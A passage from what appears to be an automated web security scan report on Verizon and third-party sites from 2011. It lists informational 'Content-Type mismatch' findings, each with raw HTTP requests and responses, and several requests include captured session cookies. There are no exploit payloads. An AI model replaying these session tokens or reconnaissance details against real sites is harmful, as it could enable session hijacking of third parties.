
26.33. http://headlines.verizon.com/headlines/resources/images/navOff_06.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_06.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 547
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...A..........|.
....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0.MO]..X..`.t...F..`.F(#.+0B........D....l...q0..9.i.6.....).
... <....UU....}?;.........&.%.-....
...[SNIP]...

26.34. http://headlines.verizon.com/headlines/resources/images/navOff_07.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_07.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 503
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0..S....
Y!7.+..0...FhF(#...#.#pv.|.Yp.....K..qB^....4M.+.[."..F......_@Y..=....m.......Av..|.'..;Y
...[SNIP]...

26.35. http://headlines.verizon.com/headlines/resources/images/navOff_08.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_08.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 441
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...0.................gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...KIDATx..V.m. ......+..v.;..PG.#.... +..+0../.....V.._.%/ ...qGT....l/..[....w..[.]...Z1.....,...=.mY'...m..n.8.
...[SNIP]...

26.36. http://headlines.verizon.com/headlines/resources/images/navOn_01.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOn_01.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1288
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...S..........'......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WKo.H..;.8.L.a..J.j.. .w$.'.8.'V .....C.IPx.x\ 7..!n....V".....DrA+m..0....c.....=.{C .=....].U_U.c[.
...[SNIP]...

26.37. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/pageTitleHeadlines.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.38. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/primaryNavPipe.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.39. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_pause.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/tstories/tStoriesControl_pause.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_pause.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 485
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.40. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_right.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/tstories/tStoriesControl_right.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_right.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 635
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.41. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_rightOn.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/tstories/tStoriesControl_rightOn.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_rightOn.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381; CP=null*; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 967
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:57 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.42. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/twit_pipe.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.43. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/verizonEmail.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.44. http://maps.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 05 Sep 2011 22:35:30 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

26.45. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.46. http://sales.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=44153975 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=44153975
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1ce6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:15:21 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.47. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.48. https://seal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://seal.verisign.com
Path:	/getseal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

26.49. https://secure.opinionlab.com/rate36_json.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/rate36_json.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

26.50. https://secure.opinionlab.com/rate36s.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/rate36s.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

26.51. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=2329305 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=2329305
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:27d6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Mon, 05 Sep 2011 22:16:46 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.52. http://syndicate.verizon.com/ads/js.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://syndicate.verizon.com
Path:	/ads/js.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right1&hbx=Right,Right1 HTTP/1.1
Host: syndicate.verizon.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential

Response

26.53. http://syndicate.verizon.net/ads/js.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://syndicate.verizon.net
Path:	/ads/js.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepage&pos=Top1,x13 HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

26.54. http://syndicate.verizon.net/ads/scripthandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://syndicate.verizon.net
Path:	/ads/scripthandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ads/scripthandler.ashx?source=business2.vz.net/out/homepage HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1140
Date: Mon, 05 Sep 2011 22:36:02 GMT
Connection: close

// using application id: business2.vz.net
// using page id: out/homepage

var vz_included_elements = new Array(); // remember everything we've added to the DOM
// this will redefine
...[SNIP]...

26.55. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/m2/verizonwireless/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=2&loggedin=false&Hp=prospects&mbox=VZW_Global_Header&mboxId=0&mboxTime=1315260873834&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 172
Date: Mon, 05 Sep 2011 22:14:33 GMT
Server: Test & Target

mboxFactories.get('default').get('VZW_Global_Header',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315278871714-190238.19");

26.56. http://www.connecttoverizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.connecttoverizon.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:18 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:18 GMT
Last-Modified: Thu, 27 Aug 2009 19:05:05 GMT
ETag: "3cc997-37e-4a96d8e1"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

26.57. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Averizon.com+ECSPCookies HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:30:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 16699

